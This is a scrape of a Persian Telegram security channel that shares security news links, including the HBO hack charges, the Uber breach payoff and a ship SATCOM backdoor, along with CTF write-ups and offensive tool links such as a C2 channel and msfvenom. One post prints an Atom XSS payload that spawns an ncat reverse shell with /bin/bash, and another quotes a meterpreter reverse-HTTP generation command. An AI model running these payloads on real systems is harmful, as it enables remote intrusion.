تمپلیت html رایگان StarAdmin
https://github.com/BootstrapDash/StarAdmin-Free-Bootstrap-Admin-Template
#html
#template
@sec_nerd
https://github.com/BootstrapDash/StarAdmin-Free-Bootstrap-Admin-Template
#html
#template
@sec_nerd
امنیت اطلاعات
دادگستری آمریکا با متهم کردن یک ایرانی به نام «بهزاد مصری» به هک کردن شبکه رایانهای شرکت سازنده سریال «بازی تاج و تخت» و سرقت قسمتهای منتشر نشده آن، وی را تحت پیگرد قرار داد. منبع : فارس #news #iran #usa #breach #got7 @sec_nerd
Iranian Behzad Mesri charged in HBO hack, ‘Game of Thrones’ script theft
بهزاد مصری به عنوان عضوی از گروه هکری Turk Black Hat Security توسط دادگستری ایالات متحده به عنوان مجرم معرفی و تحت پیگرد قرار گرفت.
این تیم با ادعای nbc برای ارتش ایران علیه اسراییل اقدام به حملات سایبری کرده است.
@sec_nerd
هک شبکه HBO در دادگاه ارتباطی به دولت ایران پیدا نکرده و مصری به صورت شخصی این حمله را صورت داده است.
این هکر موفق شد با نفوذ به حساب کارکنان کمپانی HBO چهار قسمت از فصل هفت سریال Game of Thrones را بدست آورد.
https://www.nbcnews.com/news/world/iranian-behzad-mesri-charged-hbo-hack-game-thrones-script-theft-n822831
پست های مرتبط در زمان وقوع این حمله که در کانال پوشش داده شد:
https://t.iss.one/sec_nerd/414
https://t.iss.one/sec_nerd/443
https://t.iss.one/sec_nerd/464
#hbo
#got7
#iran
#usa
@sec_nerd
بهزاد مصری به عنوان عضوی از گروه هکری Turk Black Hat Security توسط دادگستری ایالات متحده به عنوان مجرم معرفی و تحت پیگرد قرار گرفت.
این تیم با ادعای nbc برای ارتش ایران علیه اسراییل اقدام به حملات سایبری کرده است.
@sec_nerd
هک شبکه HBO در دادگاه ارتباطی به دولت ایران پیدا نکرده و مصری به صورت شخصی این حمله را صورت داده است.
این هکر موفق شد با نفوذ به حساب کارکنان کمپانی HBO چهار قسمت از فصل هفت سریال Game of Thrones را بدست آورد.
https://www.nbcnews.com/news/world/iranian-behzad-mesri-charged-hbo-hack-game-thrones-script-theft-n822831
پست های مرتبط در زمان وقوع این حمله که در کانال پوشش داده شد:
https://t.iss.one/sec_nerd/414
https://t.iss.one/sec_nerd/443
https://t.iss.one/sec_nerd/464
#hbo
#got7
#iran
#usa
@sec_nerd
NBC News
The feds say an Iranian hacked HBO and stole "Game of Thrones" material
Mesri allegedly launched a campaign in May to gain access to HBO's servers through employee user accounts, and then got his hands on new episodes of hit shows.
گوگل اطلاعات مکان گوشی را حتی زمانی که GPS خاموش است جمع آوری میکند!
https://bit.ly/2A11WzM
#google
#android
#spy
@sec_nerd
https://bit.ly/2A11WzM
#android
#spy
@sec_nerd
امنیت اطلاعات
در سیستم ماهواره ای کشتی های جهان به نام SATCOM حساب مخفی کشف شد. این سیستم که بر روی کشتی ها نصب شده است دارای یک حساب کاربری مخفی با سطح دسترسی ادمین و یک باگ SQLi در فرم لاگین می باشد. https://www.bleepingcomputer.com/news/security/backdoor-account-found…
اجرای OSINT برای سیستم کنترل کشتی ها که چندی پیش مورد نفوذ قرار گرفت + شناسایی افراد
https://www.pentestpartners.com/security-blog/osint-from-ship-satcoms/
#breach
#ship
#backdoor
#satcom
#osint
@sec_nerd
https://www.pentestpartners.com/security-blog/osint-from-ship-satcoms/
#breach
#ship
#backdoor
#satcom
#osint
@sec_nerd
Pen Test Partners
OSINT from ship satcoms | Pen Test Partners
I gave a talk in Athens recently to a number of shipping lines about infosec. One thing that struck me were the similarities between the challenges maritime cyber is facing now and the challenges industrial controls security in utilities started addressing…
This media is not supported in your browser
VIEW IN TELEGRAM
بیش از ۴۰۰ وبسایت بزرگ موس و کیبورد شما را ضبط میکنند!
https://bit.ly/2zudtdS
#trackers
#privacy
@sec_nerd
https://bit.ly/2zudtdS
#trackers
#privacy
@sec_nerd
ابزار تبدیل پروسه مرورگر به عنوان واسط برقراری ارتباط بدافزار با سرور C2
https://github.com/Arno0x/WSC2
#c2
#malware
#botnet
@sec_nerd
https://github.com/Arno0x/WSC2
#c2
#malware
#botnet
@sec_nerd
امنیت اطلاعات
باگ xss در برنامه atom که منجر به اجرای دستور از راه دور میشود! <script> https://window.top .require('child_process').execFile('/usr/bin/xterm',['-e', 'ncat 127.0.0.1 4242 -e /bin/bash']); </script> #atom #rce #xss #dev @sec_Nerd
*XSS via different extensions
*SSI in IIS
*RCE in IIS
https://mike-n1.github.io/ExtensionsOverview
#writeup
#xss
#rce
@sec_nerd
*SSI in IIS
*RCE in IIS
https://mike-n1.github.io/ExtensionsOverview
#writeup
#xss
#rce
@sec_nerd
شرکت uber در سال ۲۰۱۶ مورد نفوذ قرار گرفت و اطلاعات شخصی شامل نام، آدرس و شماره تلفن 57 میلیون کاربر این سایت توسط هکرها سرقت شد.
این شرکت برای رسانه ای نکردن این موضوع مبلغ صد هزار دلار به هکرها پرداخت کرد!
https://www.grahamcluley.com/uber-hackers-paid-data-breach/
#uber
#breach
#ransom
@sec_nerd
این شرکت برای رسانه ای نکردن این موضوع مبلغ صد هزار دلار به هکرها پرداخت کرد!
https://www.grahamcluley.com/uber-hackers-paid-data-breach/
#uber
#breach
#ransom
@sec_nerd
Graham Cluley
Uber paid hackers $100,000 to keep data breach quiet
You can ask forgiveness for being hacked, but many people will find it harder to forgive and forget if you deliberately concealed the truth from them.
H1-212 2017: Writeup
رایت آپ با موضوع نفوذ به وب
https://zeta-two.com/ctf/2017/11/20/h1212-writeup.html
#writeup
#ssrf
#web
@sec_nerd
رایت آپ با موضوع نفوذ به وب
https://zeta-two.com/ctf/2017/11/20/h1212-writeup.html
#writeup
#ssrf
#web
@sec_nerd
Zeta-Two
H1-212 2017: Writeup
Hackerone is hosting an event in New York this december and ran a CTF as a secondary way to get an invite to the event.I visited the H1-702 event in Las Vega...
امنیت اطلاعات
Iranian Behzad Mesri charged in HBO hack, ‘Game of Thrones’ script theft بهزاد مصری به عنوان عضوی از گروه هکری Turk Black Hat Security توسط دادگستری ایالات متحده به عنوان مجرم معرفی و تحت پیگرد قرار گرفت. این تیم با ادعای nbc برای ارتش ایران علیه اسراییل…
گزارش فوربس در مورد این هکر و مطالبی که به نقل از فردی به نام کالین اندرسون ، محققی که در دانشگاه کارنگی ملون واشنگتن برروی قابلیتهای سایبری ایران کار میکند!
در ادامه به تناقضات موجود در این گزارش که هر شخصی (حتی با اطلاعات کم از حملات سایبری) را به فکر فرو میبرد، اشاره خواهیم کرد
1-مصری برای سیستم نظامی ایران کار کرده و شبکه های نظامی،هسته ای و زیرساختهای اسراییلی را هدف قرار داده است .
2-کالین اندرسون اشاره میکند که مصری تحت عنوان نام Skot vahshat برای گروه هکرهای TBH اقدام به دیفیس وب سایت میکرده و با احتمال زیاد این حملات با تکنیک های معمولی که تحت عنوان SQL injection شناخته میشوند اهداف را دیفیس کرده است!
3-مصری در فعالیتهای خود ملاحظات امنیتی را مراعات نمیکرده است. زیرا اقدام به درج ایمیل خود در صفحات دیفیس کرده و آدرس وی نیز در اطلاعات کاربری وی در جیمیل موجود است.
4-مصری شبکه HBO را اسکن کرده و به دنبال نقطه ضعفی برای ورود بوده و موفق شده بصورت ریموت وارد حساب کاربری کارکنان و سپس شبکه داخلی شود.این اتفاق بین ماه های می و جولای رخ داده است و اون توانسته اطلاعات شبکه های داخلی این شرکت اعم از قسمتهایی از سریال GOT و شوهای تلویزیونی مانند Curb Your Enthusiasm و The Deuce را نیز بدست آورد!
5-آدام میرز از CrowdStrike نیز گفته است «دلیلی وجود ندارد که باور کنیم این شخص یک هکر نخبه بوده است!»
6-باز هم با نقل قول از میرز میگوید: ایران کره شمالی نیست،ایرانی بودن این فرد دلیلی بر نقش حکومت ایران در این حمله نمیباشد. (کره شمالی پیش از این کمپانی سونی را هک کرده بود)
https://www.forbes.com/sites/thomasbrewster/2017/11/21/basic-hacker-or-elite-cyber-spy-feds-say-this-iranian-tried-to-extort-hbo-for-6bn/
#hbo
#got7
#iran
#usa
@sec_nerd
در ادامه به تناقضات موجود در این گزارش که هر شخصی (حتی با اطلاعات کم از حملات سایبری) را به فکر فرو میبرد، اشاره خواهیم کرد
1-مصری برای سیستم نظامی ایران کار کرده و شبکه های نظامی،هسته ای و زیرساختهای اسراییلی را هدف قرار داده است .
2-کالین اندرسون اشاره میکند که مصری تحت عنوان نام Skot vahshat برای گروه هکرهای TBH اقدام به دیفیس وب سایت میکرده و با احتمال زیاد این حملات با تکنیک های معمولی که تحت عنوان SQL injection شناخته میشوند اهداف را دیفیس کرده است!
3-مصری در فعالیتهای خود ملاحظات امنیتی را مراعات نمیکرده است. زیرا اقدام به درج ایمیل خود در صفحات دیفیس کرده و آدرس وی نیز در اطلاعات کاربری وی در جیمیل موجود است.
4-مصری شبکه HBO را اسکن کرده و به دنبال نقطه ضعفی برای ورود بوده و موفق شده بصورت ریموت وارد حساب کاربری کارکنان و سپس شبکه داخلی شود.این اتفاق بین ماه های می و جولای رخ داده است و اون توانسته اطلاعات شبکه های داخلی این شرکت اعم از قسمتهایی از سریال GOT و شوهای تلویزیونی مانند Curb Your Enthusiasm و The Deuce را نیز بدست آورد!
5-آدام میرز از CrowdStrike نیز گفته است «دلیلی وجود ندارد که باور کنیم این شخص یک هکر نخبه بوده است!»
6-باز هم با نقل قول از میرز میگوید: ایران کره شمالی نیست،ایرانی بودن این فرد دلیلی بر نقش حکومت ایران در این حمله نمیباشد. (کره شمالی پیش از این کمپانی سونی را هک کرده بود)
https://www.forbes.com/sites/thomasbrewster/2017/11/21/basic-hacker-or-elite-cyber-spy-feds-say-this-iranian-tried-to-extort-hbo-for-6bn/
#hbo
#got7
#iran
#usa
@sec_nerd
Forbes
Feds Say This Iranian Hacker Tried To Extort HBO For $6 Million -- Here's What We Know About Him
Here's everything we know about the alleged HBO hacker...
امنیت اطلاعات
گزارش فوربس در مورد این هکر و مطالبی که به نقل از فردی به نام کالین اندرسون ، محققی که در دانشگاه کارنگی ملون واشنگتن برروی قابلیتهای سایبری ایران کار میکند! در ادامه به تناقضات موجود در این گزارش که هر شخصی (حتی با اطلاعات کم از حملات سایبری) را به فکر فرو…
این تحلیل از سوی ادمین های این کانال ارائه شده و قضاوتی در مورد اینکه اصلا این هک توسط ایرانی ها انجام شده یا فردی به اسم مصری وجود خارجی داشته یا خیر و یا حتی توانمندیهای این هکر و یا سایر هکرهای ایرانی نخواهیم داشت.
تناقضاتی در سخنان امریکایی ها وجود دارد که به برخی از آنها اشاره میکنیم:
این گزارش بر این اساس که این حمله توسط یک هکر و دیفیسر ایرانی انجام شده شکل گرفته و ذهنیت کارشناسان این گزارش و نویسنده با این تفکر (ضعیف شمردن) مطلب را پیش میبرد.
از جمله این تناقضات میتوان به نام بردن از حمله SQL injection به عنوان یک حمله معمولی اشاره کرد در حالی که این حمله در وبسایت OWASP در رده نخست حملات و در تمام حملات سایبری وب جزو خطرناکترین و موثرترین حملات است و وبسایتهای بزرگی مانند فیسبوک، یاهو، فلیکر و ... با این آسیب پذیری روبرو بوده اند!
کارشناس مذکور اشاره میکند ، این هکر که بنظر نمیرسد توانایی زیادی داشته باشد با اسکن شبکه و ورود به شبکه داخلی و دانلود هرچه که ارزشمند بوده (اطلاعات شخصی بازیگران نیز در این حمله سرقت شده) ، باز هم اسکریپت کید است! اولین فکری که به ذهن هر شخصی میرسد تعریف حمله سایبری است که معمولا دستیابی به شبکه داخلی، یک هدف بسیار مهم برای هر هکری است که مصری موفق به انجام آن شده است.پس استفاده از لفظ اسکریپت کید نشان از عدم تحمل وقوع این حمله توسط هکرهای ایرانی دارد.
اگر بخواهیم بدون طرفداری از دو طرف این قضیه فکر کنیم و نظر بدهیم خواهیم دید که این حمله یک حمله ساده نبوده و نفوذ به شبکه داخلی شرکتی مانند HBO به آسانی اسکن کردن و ورود به حساب کاربری کارکنان و سپس شبکه داخلی نیست و این گزارش نشان از عدم تحمل کارشناسان امریکایی در پی بروز چنین حملاتی به وب سایتهای آنان دارد.
#hbo
#got7
#iran
#usa
@sec_nerd
تناقضاتی در سخنان امریکایی ها وجود دارد که به برخی از آنها اشاره میکنیم:
این گزارش بر این اساس که این حمله توسط یک هکر و دیفیسر ایرانی انجام شده شکل گرفته و ذهنیت کارشناسان این گزارش و نویسنده با این تفکر (ضعیف شمردن) مطلب را پیش میبرد.
از جمله این تناقضات میتوان به نام بردن از حمله SQL injection به عنوان یک حمله معمولی اشاره کرد در حالی که این حمله در وبسایت OWASP در رده نخست حملات و در تمام حملات سایبری وب جزو خطرناکترین و موثرترین حملات است و وبسایتهای بزرگی مانند فیسبوک، یاهو، فلیکر و ... با این آسیب پذیری روبرو بوده اند!
کارشناس مذکور اشاره میکند ، این هکر که بنظر نمیرسد توانایی زیادی داشته باشد با اسکن شبکه و ورود به شبکه داخلی و دانلود هرچه که ارزشمند بوده (اطلاعات شخصی بازیگران نیز در این حمله سرقت شده) ، باز هم اسکریپت کید است! اولین فکری که به ذهن هر شخصی میرسد تعریف حمله سایبری است که معمولا دستیابی به شبکه داخلی، یک هدف بسیار مهم برای هر هکری است که مصری موفق به انجام آن شده است.پس استفاده از لفظ اسکریپت کید نشان از عدم تحمل وقوع این حمله توسط هکرهای ایرانی دارد.
اگر بخواهیم بدون طرفداری از دو طرف این قضیه فکر کنیم و نظر بدهیم خواهیم دید که این حمله یک حمله ساده نبوده و نفوذ به شبکه داخلی شرکتی مانند HBO به آسانی اسکن کردن و ورود به حساب کاربری کارکنان و سپس شبکه داخلی نیست و این گزارش نشان از عدم تحمل کارشناسان امریکایی در پی بروز چنین حملاتی به وب سایتهای آنان دارد.
#hbo
#got7
#iran
#usa
@sec_nerd
امنیت اطلاعات
H1-212 2017: Writeup رایت آپ با موضوع نفوذ به وب https://zeta-two.com/ctf/2017/11/20/h1212-writeup.html #writeup #ssrf #web @sec_nerd
رایت آپ همین CTF با روشی دیگر توسط فردی دیگر
https://10degres.net/ctf-h1-212/
#writeup
#ssrf
#web
@sec_nerd
https://10degres.net/ctf-h1-212/
#writeup
#ssrf
#web
@sec_nerd
Gwendal Le Coguic
Fail at CTF h1-212 - The Evil Job
Gwendal Le Coguic, web developer and security researcher
ابزار RDPY برای نفوذ به ریموت دسکتاپ
https://www.darknet.org.uk/2017/11/rdpy-rdp-security-tool-hacking-remote-desktop-protocol/
#rdp
#windows
@sec_nerd
https://www.darknet.org.uk/2017/11/rdpy-rdp-security-tool-hacking-remote-desktop-protocol/
#rdp
#windows
@sec_nerd
تولید اسکریپتهای پاورشل با استفاده از msfvenom در ویندوز
https://blog.didierstevens.com/2017/08/16/generating-powershell-scripts-with-msfvenom-on-windows/
#windows
#msfvenom
#Ps
#network
#pentest
@sec_nerd
https://blog.didierstevens.com/2017/08/16/generating-powershell-scripts-with-msfvenom-on-windows/
#windows
#msfvenom
#Ps
#network
#pentest
@sec_nerd
Didier Stevens
Generating PowerShell Scripts With MSFVenom On Windows
To generate a PowerShell script with msfvenom on Windows, use the command “msfvenom.bat –payload windows/x64/meterpreter_reverse_http –format psh –out meterpreter-64.ps1 LHO…